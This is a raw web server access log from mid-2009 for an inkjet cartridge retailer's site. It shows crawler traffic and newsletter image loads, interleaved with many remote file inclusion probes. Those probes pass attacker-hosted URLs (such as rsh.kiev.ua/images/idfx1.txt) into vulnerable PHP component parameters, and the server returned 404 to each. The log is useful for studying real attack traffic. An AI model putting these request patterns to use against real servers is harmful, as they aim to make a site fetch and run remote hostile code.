72.30.78.219 - - [30/Jun/2009:17:14:45 -0700] "GET /phpbb/profile.php?mode=viewprofile&u=208 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.30.78.219 - - [30/Jun/2009:17:22:34 -0700] "GET /links/links4.html HTTP/1.0" 200 27407 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.30.78.219 - - [30/Jun/2009:17:32:15 -0700] "GET /phpbb/viewtopic.php?t=112 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:17:34:23 -0700] "GET /administrator/components/com_virtuemart/header.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:17:34:23 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/header.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:17:34:29 -0700] "GET /logs//administrator/components/com_virtuemart/header.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:17:34:56 -0700] "GET /administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:17:34:56 -0700] "GET /logs//administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:17:34:56 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:17:36:11 -0700] "GET /administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:17:36:12 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:17:36:12 -0700] "GET /logs//administrator/components/com_virtuemart/version.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.55.106.235 - - [30/Jun/2009:17:44:35 -0700] "GET /tmp/?S=A HTTP/1.1" 200 802 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
72.30.142.95 - - [30/Jun/2009:17:54:04 -0700] "GET /phpbb/viewtopic.php?p=692 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
38.98.120.80 - - [30/Jun/2009:17:54:46 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "ShopWiki/1.0 ( +http://www.shopwiki.com/wiki/Help:Bot)" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:17:56:51 -0700] "GET /phpbb/viewtopic.php?t=591 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
24.16.67.140 - - [30/Jun/2009:17:57:22 -0700] "GET /email/images/inkmail2_02.gif HTTP/1.1" 200 16031 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; Comcast Install 1.0; .NET CLR 1.1.4322; Zango 10.3.37.0)" "site.inkjetcartridge.com"
24.16.67.140 - - [30/Jun/2009:17:57:22 -0700] "GET /email/images/inkmail2_01.gif HTTP/1.1" 200 7881 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; Comcast Install 1.0; .NET CLR 1.1.4322; Zango 10.3.37.0)" "site.inkjetcartridge.com"
193.243.139.4 - - [30/Jun/2009:18:09:59 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.243.139.4 - - [30/Jun/2009:18:10:02 -0700] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.243.139.4 - - [30/Jun/2009:18:10:04 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
193.243.139.4 - - [30/Jun/2009:18:13:19 -0700] "GET /logs/access.log%20%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
89.149.244.84 - - [30/Jun/2009:18:34:54 -0700] "GET /phpbb/posting.php?mode=reply&t=176 HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/viewtopic.php?t=176&start=300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
68.193.57.147 - - [30/Jun/2009:18:34:59 -0700] "POST /phpbb/posting.php HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/posting.php?mode=reply&t=176" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
201.132.45.123 - - [30/Jun/2009:18:35:06 -0700] "POST /phpbb/posting.php HTTP/1.1" 200 534 "http://site.inkjetcartridge.com/phpbb/posting.php?mode=reply&t=176" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "site.inkjetcartridge.com"
70.251.114.70 - - [30/Jun/2009:18:56:10 -0700] "GET /email/images/inkmail13_02.gif HTTP/1.1" 200 16093 "http://us.mc331.mail.yahoo.com/mc/welcome?.gx=1&.tm=1246410146&.rand=9md32pf7gp5kj" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; T312461; AIRF; YComp 5.0.0.0; NET M@NAGER V2.0 - WWW.VINN.COM.AU)" "site.inkjetcartridge.com"
70.251.114.70 - - [30/Jun/2009:18:56:10 -0700] "GET /email/images/inkmail13_04.gif HTTP/1.1" 200 17176 "http://us.mc331.mail.yahoo.com/mc/welcome?.gx=1&.tm=1246410146&.rand=9md32pf7gp5kj" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; T312461; AIRF; YComp 5.0.0.0; NET M@NAGER V2.0 - WWW.VINN.COM.AU)" "site.inkjetcartridge.com"
70.251.114.70 - - [30/Jun/2009:18:58:18 -0700] "GET /images/epson-c88.jpg HTTP/1.1" 200 6555 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; T312461; AIRF; YComp 5.0.0.0; NET M@NAGER V2.0 - WWW.VINN.COM.AU)" "site.inkjetcartridge.com"
70.251.114.70 - - [30/Jun/2009:18:58:18 -0700] "GET /images/canon-pixma-ip3500.jpg HTTP/1.1" 200 39459 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; T312461; AIRF; YComp 5.0.0.0; NET M@NAGER V2.0 - WWW.VINN.COM.AU)" "site.inkjetcartridge.com"
70.251.114.70 - - [30/Jun/2009:18:58:18 -0700] "GET /images/canon-pixma-ip4500.jpg HTTP/1.1" 200 28688 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; T312461; AIRF; YComp 5.0.0.0; NET M@NAGER V2.0 - WWW.VINN.COM.AU)" "site.inkjetcartridge.com"
70.251.114.70 - - [30/Jun/2009:18:58:18 -0700] "GET /images/canon-pixma-pro9000.jpg HTTP/1.1" 200 24854 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; T312461; AIRF; YComp 5.0.0.0; NET M@NAGER V2.0 - WWW.VINN.COM.AU)" "site.inkjetcartridge.com"
70.251.114.70 - - [30/Jun/2009:18:58:18 -0700] "GET /images/epson-r2400.jpg HTTP/1.1" 200 3335 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; T312461; AIRF; YComp 5.0.0.0; NET M@NAGER V2.0 - WWW.VINN.COM.AU)" "site.inkjetcartridge.com"
70.251.114.70 - - [30/Jun/2009:18:58:18 -0700] "GET /images/hp-laserjet3050.jpg HTTP/1.1" 200 19965 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; T312461; AIRF; YComp 5.0.0.0; NET M@NAGER V2.0 - WWW.VINN.COM.AU)" "site.inkjetcartridge.com"
70.251.114.70 - - [30/Jun/2009:18:58:18 -0700] "GET /images/samsung-clip-300.jpg HTTP/1.1" 200 24467 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; T312461; AIRF; YComp 5.0.0.0; NET M@NAGER V2.0 - WWW.VINN.COM.AU)" "site.inkjetcartridge.com"
72.201.89.230 - - [30/Jun/2009:19:00:37 -0700] "GET /email/images/inkmail13_06.gif HTTP/1.1" 200 26778 "http://co114w.col114.mail.live.com/mail/InboxLight.aspx?n=1415353744" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Q312461; Cox High Speed Internet Customer; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS)" "site.inkjetcartridge.com"
72.201.89.230 - - [30/Jun/2009:19:00:37 -0700] "GET /email/images/inkmail13_04.gif HTTP/1.1" 200 17176 "http://co114w.col114.mail.live.com/mail/InboxLight.aspx?n=1415353744" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Q312461; Cox High Speed Internet Customer; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; msn OptimizedIE8;ENUS)" "site.inkjetcartridge.com"
24.102.205.191 - - [30/Jun/2009:19:18:09 -0700] "GET /email/images/inkmail10_01.gif HTTP/1.1" 200 6655 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/530.17 (KHTML, like Gecko)" "site.inkjetcartridge.com"
24.102.205.191 - - [30/Jun/2009:19:18:09 -0700] "GET /email/images/inkmail10_04.gif HTTP/1.1" 200 15682 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/530.17 (KHTML, like Gecko)" "site.inkjetcartridge.com"
24.102.205.191 - - [30/Jun/2009:19:18:09 -0700] "GET /email/images/inkmail10_03.gif HTTP/1.1" 200 14360 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/530.17 (KHTML, like Gecko)" "site.inkjetcartridge.com"
24.102.205.191 - - [30/Jun/2009:19:18:09 -0700] "GET /email/images/inkmail10_02.gif HTTP/1.1" 200 15936 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/530.17 (KHTML, like Gecko)" "site.inkjetcartridge.com"
24.102.205.191 - - [30/Jun/2009:19:18:09 -0700] "GET /email/images/inkmail10_05.gif HTTP/1.1" 200 18868 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/530.17 (KHTML, like Gecko)" "site.inkjetcartridge.com"
24.102.205.191 - - [30/Jun/2009:19:18:09 -0700] "GET /email/images/inkmail10_06.gif HTTP/1.1" 200 26672 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en-us) AppleWebKit/530.17 (KHTML, like Gecko)" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:19:18:38 -0700] "GET /tmp/?N=A HTTP/1.0" 200 786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.15.152.12 - - [30/Jun/2009:19:20:14 -0700] "GET /include/write.php?dir=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "site.inkjetcartridge.com"
174.17.42.130 - - [30/Jun/2009:19:29:30 -0700] "GET /email/images/inkmail13_05.gif HTTP/1.0" 200 14099 "-" "CFNetwork/1.1" "site.inkjetcartridge.com"
218.232.105.116 - - [30/Jun/2009:19:30:52 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [30/Jun/2009:19:31:09 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
218.232.105.116 - - [30/Jun/2009:19:31:09 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [30/Jun/2009:19:31:17 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [30/Jun/2009:19:31:17 -0700] "GET /skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
87.98.222.18 - - [30/Jun/2009:19:31:17 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
65.55.106.139 - - [30/Jun/2009:19:35:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
71.193.75.54 - - [30/Jun/2009:19:42:01 -0700] "GET /email/images/inkmail13_02.gif HTTP/1.1" 200 16093 "http://by113w.bay113.mail.live.com/mail/InboxLight.aspx?FolderID=00000000-0000-0000-0000-000000000001&InboxSortAscending=False&InboxSortBy=Date&n=1567779462" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)" "site.inkjetcartridge.com"
71.193.75.54 - - [30/Jun/2009:19:42:01 -0700] "GET /email/images/inkmail13_01.gif HTTP/1.1" 200 6009 "http://by113w.bay113.mail.live.com/mail/InboxLight.aspx?FolderID=00000000-0000-0000-0000-000000000001&InboxSortAscending=False&InboxSortBy=Date&n=1567779462" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:20:02:20 -0700] "GET /phpbb/viewtopic.php?p=2311 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:20:08:54 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:20:08:54 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:20:09:16 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
195.34.78.110 - - [30/Jun/2009:20:09:16 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.aboutav.com//back/osiris.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:20:10:45 -0700] "GET /phpbb/viewtopic.php?t=442 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:20:13:10 -0700] "GET /logs/scripts.log/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:20:13:10 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:20:13:11 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:20:15:15 -0700] "GET /phpbb/viewtopic.php?p=2262 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:20:18:53 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:20:18:53 -0700] "GET /logs/scripts.log/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:20:18:54 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:20:23:51 -0700] "GET /phpbb/viewtopic.php?p=24278 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:20:26:03 -0700] "GET /logs/scripts.log/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:20:26:03 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:20:26:03 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "site.inkjetcartridge.com"
79.49.190.214 - - [30/Jun/2009:20:36:03 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
79.49.190.214 - - [30/Jun/2009:20:36:03 -0700] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
79.49.190.214 - - [30/Jun/2009:20:36:03 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.76.55.246 - - [30/Jun/2009:20:36:34 -0700] "GET /email/images/inkmail2_04.gif HTTP/1.1" 200 17259 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
69.76.55.246 - - [30/Jun/2009:20:36:34 -0700] "GET /email/images/inkmail2_06.gif HTTP/1.1" 200 26738 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
69.76.55.246 - - [30/Jun/2009:20:36:35 -0700] "GET /email/images/inkmail2_02.gif HTTP/1.1" 200 16031 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
69.76.55.246 - - [30/Jun/2009:20:36:35 -0700] "GET /email/images/inkmail2_05.gif HTTP/1.1" 200 14965 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
69.76.55.246 - - [30/Jun/2009:20:36:35 -0700] "GET /email/images/inkmail2_03.gif HTTP/1.1" 200 18353 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
69.76.55.246 - - [30/Jun/2009:20:36:35 -0700] "GET /email/images/inkmail2_01.gif HTTP/1.1" 200 7881 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:20:37:32 -0700] "GET /phpbb/viewtopic.php?p=1693 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:20:42:41 -0700] "GET /phpbb/viewtopic.php?p=3210 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:20:50:55 -0700] "GET /phpbb/viewtopic.php?p=4415 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:21:08:37 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:21:08:37 -0700] "GET /logs/scripts.log/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
83.98.209.71 - - [30/Jun/2009:21:08:38 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:21:09:16 -0700] "GET /phpbb/viewtopic.php?t=2102&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
24.60.172.42 - - [30/Jun/2009:21:16:51 -0700] "GET /email/images/inkmail13_01.gif HTTP/1.1" 200 6009 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko)" "site.inkjetcartridge.com"
24.60.172.42 - - [30/Jun/2009:21:16:51 -0700] "GET /email/images/inkmail13_06.gif HTTP/1.1" 200 26778 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko)" "site.inkjetcartridge.com"
24.60.172.42 - - [30/Jun/2009:21:16:51 -0700] "GET /email/images/inkmail13_05.gif HTTP/1.1" 200 14099 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko)" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:21:24:40 -0700] "GET /phpbb/viewtopic.php?t=926 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
99.135.93.16 - - [30/Jun/2009:21:44:24 -0700] "GET /email/images/inkmail13_02.gif HTTP/1.1" 200 16093 "http://co111w.col111.mail.live.com/mail/InboxLight.aspx?n=10762918" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
99.135.93.16 - - [30/Jun/2009:21:44:25 -0700] "GET /email/images/inkmail13_03.gif HTTP/1.1" 200 15936 "http://co111w.col111.mail.live.com/mail/InboxLight.aspx?n=10762918" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:21:51:38 -0700] "GET /phpbb/viewtopic.php?t=97 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:21:53:05 -0700] "GET /phpbb/viewtopic.php?p=475 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.30.142.250 - - [30/Jun/2009:21:55:29 -0700] "GET /phpbb/viewtopic.php?p=2402 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
211.203.180.144 - - [30/Jun/2009:22:00:17 -0700] "GET /logs/access.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "site.inkjetcartridge.com"
